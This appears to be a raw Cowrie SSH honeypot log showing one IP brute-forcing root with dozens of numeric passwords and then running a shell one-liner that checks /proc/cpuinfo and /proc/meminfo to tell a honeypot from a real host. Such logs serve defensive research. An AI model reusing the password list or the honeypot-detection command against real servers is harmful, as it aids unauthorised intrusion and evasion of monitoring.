{"eventid":"cowrie.login.success","username":"root","password":"100100100","message":"login attempt [root/100100100] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.848673Z","src_ip":"212.227.235.229","session":"c48996c45439"}
{"eventid":"cowrie.login.success","username":"root","password":"00000000","message":"login attempt [root/00000000] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.850282Z","src_ip":"212.227.235.229","session":"138d5c7e8716"}
{"eventid":"cowrie.login.success","username":"root","password":"708090100","message":"login attempt [root/708090100] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.852645Z","src_ip":"212.227.235.229","session":"2ff74d9e467a"}
{"eventid":"cowrie.login.success","username":"root","password":"12131415","message":"login attempt [root/12131415] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.854114Z","src_ip":"212.227.235.229","session":"a40d931b40cd"}
{"eventid":"cowrie.login.success","username":"root","password":"60606060","message":"login attempt [root/60606060] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.855406Z","src_ip":"212.227.235.229","session":"9d429f88c382"}
{"eventid":"cowrie.login.success","username":"root","password":"00008888","message":"login attempt [root/00008888] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.856771Z","src_ip":"212.227.235.229","session":"6900bcd32cc5"}
{"eventid":"cowrie.login.success","username":"root","password":"12341234","message":"login attempt [root/12341234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.903129Z","src_ip":"212.227.235.229","session":"77edc7263a7b"}
{"eventid":"cowrie.login.success","username":"root","password":"55557777","message":"login attempt [root/55557777] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.908627Z","src_ip":"212.227.235.229","session":"be6ecc1fc7c4"}
{"eventid":"cowrie.login.success","username":"root","password":"33336666","message":"login attempt [root/33336666] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.909561Z","src_ip":"212.227.235.229","session":"df568fdbbf70"}
{"eventid":"cowrie.login.success","username":"root","password":"88889999","message":"login attempt [root/88889999] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.910438Z","src_ip":"212.227.235.229","session":"741a3a19b055"}
{"eventid":"cowrie.login.success","username":"root","password":"22229999","message":"login attempt [root/22229999] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.911703Z","src_ip":"212.227.235.229","session":"a015b407c6d9"}
{"eventid":"cowrie.login.success","username":"root","password":"22220000","message":"login attempt [root/22220000] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.913900Z","src_ip":"212.227.235.229","session":"12c310641a84"}
{"eventid":"cowrie.login.success","username":"root","password":"11116666","message":"login attempt [root/11116666] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.915401Z","src_ip":"212.227.235.229","session":"c780870ec0bb"}
{"eventid":"cowrie.login.success","username":"root","password":"11118888","message":"login attempt [root/11118888] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.917621Z","src_ip":"212.227.235.229","session":"05baf31ace39"}
{"eventid":"cowrie.login.success","username":"root","password":"22226666","message":"login attempt [root/22226666] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.919805Z","src_ip":"212.227.235.229","session":"1faa2175da37"}
{"eventid":"cowrie.login.success","username":"root","password":"22228888","message":"login attempt [root/22228888] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.921350Z","src_ip":"212.227.235.229","session":"c471bc8cf228"}
{"eventid":"cowrie.login.success","username":"root","password":"33333333","message":"login attempt [root/33333333] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.922533Z","src_ip":"212.227.235.229","session":"ea6c7f2d675e"}
{"eventid":"cowrie.login.success","username":"root","password":"22222222","message":"login attempt [root/22222222] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.924004Z","src_ip":"212.227.235.229","session":"73ffd5e8d59e"}
{"eventid":"cowrie.login.success","username":"root","password":"88888888","message":"login attempt [root/88888888] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.925397Z","src_ip":"212.227.235.229","session":"4245a93d2efd"}
{"eventid":"cowrie.login.success","username":"root","password":"11113333","message":"login attempt [root/11113333] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.927014Z","src_ip":"212.227.235.229","session":"9ca56bfd521e"}
{"eventid":"cowrie.login.success","username":"root","password":"33331111","message":"login attempt [root/33331111] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.928616Z","src_ip":"212.227.235.229","session":"58bb48fbd485"}
{"eventid":"cowrie.login.success","username":"root","password":"11110000","message":"login attempt [root/11110000] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.929799Z","src_ip":"212.227.235.229","session":"e31d14d291a7"}
{"eventid":"cowrie.login.success","username":"root","password":"44443333","message":"login attempt [root/44443333] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.932069Z","src_ip":"212.227.235.229","session":"fbd4d5328bbb"}
{"eventid":"cowrie.login.success","username":"root","password":"33332222","message":"login attempt [root/33332222] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.933509Z","src_ip":"212.227.235.229","session":"6a0eea54f022"}
{"eventid":"cowrie.login.success","username":"root","password":"66666666","message":"login attempt [root/66666666] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.935262Z","src_ip":"212.227.235.229","session":"578e4fefda86"}
{"eventid":"cowrie.login.success","username":"root","password":"99999999","message":"login attempt [root/99999999] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.936829Z","src_ip":"212.227.235.229","session":"b318c1207969"}
{"eventid":"cowrie.login.success","username":"root","password":"44444444","message":"login attempt [root/44444444] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.938089Z","src_ip":"212.227.235.229","session":"eb8fa707aa14"}
{"eventid":"cowrie.login.success","username":"root","password":"100010001000","message":"login attempt [root/100010001000] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.939579Z","src_ip":"212.227.235.229","session":"66cfba061dca"}
{"eventid":"cowrie.login.success","username":"root","password":"77776666","message":"login attempt [root/77776666] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.949562Z","src_ip":"212.227.235.229","session":"ed1d0d61800d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.951292Z","src_ip":"212.227.235.229","session":"61449104323e"}
{"eventid":"cowrie.login.success","username":"root","password":"88885555","message":"login attempt [root/88885555] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.952572Z","src_ip":"212.227.235.229","session":"64c1a41e4ce3"}
{"eventid":"cowrie.login.success","username":"root","password":"11119999","message":"login attempt [root/11119999] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.954881Z","src_ip":"212.227.235.229","session":"b6a09a73a576"}
{"eventid":"cowrie.login.success","username":"root","password":"77777777","message":"login attempt [root/77777777] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.956061Z","src_ip":"212.227.235.229","session":"d4541b10f978"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.957606Z","src_ip":"212.227.235.229","session":"c078af94a6a3"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.958306Z","src_ip":"212.227.235.229","session":"bfb3ef0b06fd"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.960004Z","src_ip":"212.227.235.229","session":"804cba12643e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.960696Z","src_ip":"212.227.235.229","session":"6b767de709c9"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.961496Z","src_ip":"212.227.235.229","session":"2cadf41aeac0"}
{"eventid":"cowrie.login.success","username":"root","password":"66665555","message":"login attempt [root/66665555] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.962184Z","src_ip":"212.227.235.229","session":"028b156eed68"}
{"eventid":"cowrie.login.success","username":"root","password":"77774444","message":"login attempt [root/77774444] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.963631Z","src_ip":"212.227.235.229","session":"3e5f69d26905"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.964931Z","src_ip":"212.227.235.229","session":"268b12906f8c"}
{"eventid":"cowrie.login.success","username":"root","password":"33337777","message":"login attempt [root/33337777] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.965885Z","src_ip":"212.227.235.229","session":"358a6c3a1814"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.967113Z","src_ip":"212.227.235.229","session":"054331afa073"}
{"eventid":"cowrie.login.success","username":"root","password":"22225555","message":"login attempt [root/22225555] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.968110Z","src_ip":"212.227.235.229","session":"9f01f0139fd2"}
{"eventid":"cowrie.login.success","username":"root","password":"11115555","message":"login attempt [root/11115555] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.969266Z","src_ip":"212.227.235.229","session":"2728192b2769"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.970847Z","src_ip":"212.227.235.229","session":"4ebe652a4aef"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.971598Z","src_ip":"212.227.235.229","session":"cac88380c723"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.972437Z","src_ip":"212.227.235.229","session":"be641c7f0eea"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.973058Z","src_ip":"212.227.235.229","session":"0c7cb507cfa4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.974033Z","src_ip":"212.227.235.229","session":"50459e2ed94b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.974822Z","src_ip":"212.227.235.229","session":"010f3872944a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.975338Z","src_ip":"212.227.235.229","session":"64a4edae596d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.975958Z","src_ip":"212.227.235.229","session":"971dee2568ef"}
{"eventid":"cowrie.login.success","username":"root","password":"22221111","message":"login attempt [root/22221111] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.976944Z","src_ip":"212.227.235.229","session":"7710db0aaa0f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.978519Z","src_ip":"212.227.235.229","session":"406ad0cd93dd"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.979410Z","src_ip":"212.227.235.229","session":"a7c0b3b3fe87"}
{"eventid":"cowrie.login.success","username":"root","password":"11117777","message":"login attempt [root/11117777] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.980101Z","src_ip":"212.227.235.229","session":"b22bea344e73"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.981587Z","src_ip":"212.227.235.229","session":"4c0cece41bf3"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.982160Z","src_ip":"212.227.235.229","session":"da4fb51bdd71"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.982837Z","src_ip":"212.227.235.229","session":"d99067db7f09"}
{"eventid":"cowrie.login.success","username":"root","password":"33334444","message":"login attempt [root/33334444] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.983759Z","src_ip":"212.227.235.229","session":"7def5b455794"}
{"eventid":"cowrie.login.success","username":"root","password":"22224444","message":"login attempt [root/22224444] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.984976Z","src_ip":"212.227.235.229","session":"b09f07c8b5bd"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.986376Z","src_ip":"212.227.235.229","session":"d3fc4204b67a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.987049Z","src_ip":"212.227.235.229","session":"c48996c45439"}
{"eventid":"cowrie.login.success","username":"root","password":"88886666","message":"login attempt [root/88886666] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.987742Z","src_ip":"212.227.235.229","session":"f62ba6c762f5"}
{"eventid":"cowrie.login.success","username":"root","password":"22227777","message":"login attempt [root/22227777] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.989119Z","src_ip":"212.227.235.229","session":"29dcc0d31b57"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.990473Z","src_ip":"212.227.235.229","session":"138d5c7e8716"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.991324Z","src_ip":"212.227.235.229","session":"8c7ea15fbb02"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.991934Z","src_ip":"212.227.235.229","session":"2ff74d9e467a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.992573Z","src_ip":"212.227.235.229","session":"9d429f88c382"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.993741Z","src_ip":"212.227.235.229","session":"a40d931b40cd"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.994300Z","src_ip":"212.227.235.229","session":"6900bcd32cc5"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.008507Z","src_ip":"212.227.235.229","session":"77edc7263a7b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.032364Z","src_ip":"212.227.235.229","session":"be6ecc1fc7c4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.033475Z","src_ip":"212.227.235.229","session":"df568fdbbf70"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.035187Z","src_ip":"212.227.235.229","session":"741a3a19b055"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.037264Z","src_ip":"212.227.235.229","session":"a015b407c6d9"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.038089Z","src_ip":"212.227.235.229","session":"c780870ec0bb"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.038585Z","src_ip":"212.227.235.229","session":"05baf31ace39"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.039753Z","src_ip":"212.227.235.229","session":"12c310641a84"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.040930Z","src_ip":"212.227.235.229","session":"1faa2175da37"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.042146Z","src_ip":"212.227.235.229","session":"c471bc8cf228"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.042992Z","src_ip":"212.227.235.229","session":"ea6c7f2d675e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.043820Z","src_ip":"212.227.235.229","session":"73ffd5e8d59e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.044539Z","src_ip":"212.227.235.229","session":"4245a93d2efd"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.045513Z","src_ip":"212.227.235.229","session":"9ca56bfd521e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.046483Z","src_ip":"212.227.235.229","session":"58bb48fbd485"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.047775Z","src_ip":"212.227.235.229","session":"e31d14d291a7"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.048688Z","src_ip":"212.227.235.229","session":"fbd4d5328bbb"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.049790Z","src_ip":"212.227.235.229","session":"6a0eea54f022"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.050797Z","src_ip":"212.227.235.229","session":"578e4fefda86"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.051524Z","src_ip":"212.227.235.229","session":"b318c1207969"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.052989Z","src_ip":"212.227.235.229","session":"eb8fa707aa14"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.053713Z","src_ip":"212.227.235.229","session":"66cfba061dca"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:14:07.078056Z","src_ip":"212.227.235.229","session":"304c9ced0209"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.078792Z","src_ip":"212.227.235.229","session":"304c9ced0209"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.079492Z","src_ip":"212.227.235.229","session":"304c9ced0209"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.080941Z","src_ip":"212.227.235.229","session":"304c9ced0209"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.081833Z","src_ip":"212.227.235.229","session":"304c9ced0209"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.083200Z","src_ip":"212.227.235.229","session":"304c9ced0209"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.084270Z","src_ip":"212.227.235.229","session":"304c9ced0209"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.085006Z","src_ip":"212.227.235.229","session":"304c9ced0209"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.085914Z","src_ip":"212.227.235.229","session":"304c9ced0209"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.086865Z","src_ip":"212.227.235.229","session":"304c9ced0209"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.088086Z","src_ip":"212.227.235.229","session":"304c9ced0209"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.089441Z","src_ip":"212.227.235.229","session":"ed1d0d61800d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.090255Z","src_ip":"212.227.235.229","session":"64c1a41e4ce3"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.091477Z","src_ip":"212.227.235.229","session":"b6a09a73a576"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.092318Z","src_ip":"212.227.235.229","session":"d4541b10f978"}
{"eventid":"cowrie.login.success","username":"root","password":"55559999","message":"login attempt [root/55559999] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.095053Z","src_ip":"212.227.235.229","session":"2430e4d818c9"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.097822Z","src_ip":"212.227.235.229","session":"028b156eed68"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.099125Z","src_ip":"212.227.235.229","session":"3e5f69d26905"}
{"eventid":"cowrie.login.success","username":"root","password":"66664444","message":"login attempt [root/66664444] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.100412Z","src_ip":"212.227.235.229","session":"ab9d14443839"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.101913Z","src_ip":"212.227.235.229","session":"358a6c3a1814"}
{"eventid":"cowrie.login.success","username":"root","password":"66667777","message":"login attempt [root/66667777] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.102791Z","src_ip":"212.227.235.229","session":"3382f8a53ed9"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.104923Z","src_ip":"212.227.235.229","session":"9f01f0139fd2"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.106149Z","src_ip":"212.227.235.229","session":"7710db0aaa0f"}
{"eventid":"cowrie.login.success","username":"root","password":"55550000","message":"login attempt [root/55550000] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.106887Z","src_ip":"212.227.235.229","session":"4424eb9da624"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.108331Z","src_ip":"212.227.235.229","session":"2728192b2769"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.109008Z","src_ip":"212.227.235.229","session":"7def5b455794"}
{"eventid":"cowrie.login.success","username":"root","password":"55553333","message":"login attempt [root/55553333] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.109860Z","src_ip":"212.227.235.229","session":"9c9709ab59ff"}
{"eventid":"cowrie.login.success","username":"root","password":"55556666","message":"login attempt [root/55556666] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.111134Z","src_ip":"212.227.235.229","session":"951177aa0a0b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.112601Z","src_ip":"212.227.235.229","session":"f62ba6c762f5"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.113267Z","src_ip":"212.227.235.229","session":"b22bea344e73"}
{"eventid":"cowrie.login.success","username":"root","password":"99992222","message":"login attempt [root/99992222] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.114019Z","src_ip":"212.227.235.229","session":"170af46275dd"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.115428Z","src_ip":"212.227.235.229","session":"b09f07c8b5bd"}
{"eventid":"cowrie.login.success","username":"root","password":"55554444","message":"login attempt [root/55554444] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.116331Z","src_ip":"212.227.235.229","session":"97fa839b012c"}
{"eventid":"cowrie.login.success","username":"root","password":"66668888","message":"login attempt [root/66668888] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.117687Z","src_ip":"212.227.235.229","session":"8b0ca0bc3615"}
{"eventid":"cowrie.login.success","username":"root","password":"55558888","message":"login attempt [root/55558888] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.119031Z","src_ip":"212.227.235.229","session":"bb7e9b4a50bd"}
{"eventid":"cowrie.login.success","username":"root","password":"55551111","message":"login attempt [root/55551111] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.120260Z","src_ip":"212.227.235.229","session":"41f5516ca362"}
{"eventid":"cowrie.login.success","username":"root","password":"44445555","message":"login attempt [root/44445555] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.121602Z","src_ip":"212.227.235.229","session":"50b85e1c00f1"}
{"eventid":"cowrie.login.success","username":"root","password":"88883333","message":"login attempt [root/88883333] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.122870Z","src_ip":"212.227.235.229","session":"7e52beeaac9c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.124387Z","src_ip":"212.227.235.229","session":"29dcc0d31b57"}
{"eventid":"cowrie.login.success","username":"root","password":"88882222","message":"login attempt [root/88882222] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.125129Z","src_ip":"212.227.235.229","session":"b441f970325b"}
{"eventid":"cowrie.login.success","username":"root","password":"55552222","message":"login attempt [root/55552222] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.126698Z","src_ip":"212.227.235.229","session":"2546c7392178"}
{"eventid":"cowrie.login.success","username":"root","password":"33338888","message":"login attempt [root/33338888] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.127891Z","src_ip":"212.227.235.229","session":"67fe3aa5cc13"}
{"eventid":"cowrie.login.success","username":"root","password":"44448888","message":"login attempt [root/44448888] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.129338Z","src_ip":"212.227.235.229","session":"62dbea63fe87"}
{"eventid":"cowrie.login.success","username":"root","password":"44447777","message":"login attempt [root/44447777] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:07.130943Z","src_ip":"212.227.235.229","session":"91b2814f6688"}
